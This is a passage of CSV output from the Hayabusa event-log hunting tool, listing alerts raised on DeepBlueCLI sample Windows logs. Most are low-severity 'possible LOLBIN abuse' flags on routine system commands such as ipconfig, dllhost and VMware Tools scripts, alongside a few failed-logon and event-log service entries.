+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x820 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 23:50:16.427 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible 
LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-15 23:50:25.279 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-16 00:01:09.025 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x628 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-16 00:01:09.291 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xda4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-16 05:09:57.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a4 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-16 05:09:57.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x110 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-16 05:28:03.628 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xe64 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-16 05:28:03.894 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x744 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:53:42.990 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x9b4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:53:44.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 
0xc64 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:53:44.490 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xab8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:53:53.459 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x268 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:56:17.454 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xb10 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:56:31.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:46.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-18 07:56:46.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public 
IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-18 07:56:47.806 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:56:48.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x2f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:57:01.618 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x990 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:57:01.696 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:57:03.862 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: 
C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x671c2",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:57:04.729 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbf0 | User: IEUser | LID: 0x671c2,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 07:57:05.547 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc18 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 08:05:28.818 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x984 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-18 08:05:29.021 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:56:52.614 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd 
Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xb00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:56:53.723 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x988 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:56:53.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x22c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:56:55.848 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x810 | User: IEUser | LID: 0x671f0",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:57:03.208 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x978 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:57:32.774 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 23:57:36.030 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:09:39.097 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:09:42.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1ac | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:10:22.816 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:10:26.441 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:12:04.478 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x14c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:12:15.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:03.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 00:13:04.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2016-09-20 00:13:05.430 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware 
Tools\poweron-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x678 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:05.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x790 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:06.461 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x454 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:14.758 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x974 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:14.868 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:18.164 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xb8c | User: IEUser | LID: 0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:18.465 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xbe0 | User: IEUser | LID: 0x6590f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:20.357 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:40.443 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:13:40.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe94 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:08.521 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf74 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:09.193 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf98 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:15:06.588 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcc8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:15:06.635 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:21:37.109 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: 
C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:21:40.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:26:11.578 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xb34 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:26:16.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x6a0 | User: IEUser | LID: 0x6593d",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:26:42.937 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x37c | User: IEUser | LID: 
0x6590f",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:45:37.636 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0xe8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:36:17.350 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x508 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,info,,Logon Failure - User Does Not Exist,User: JcDfcZTc | Type: 3 | 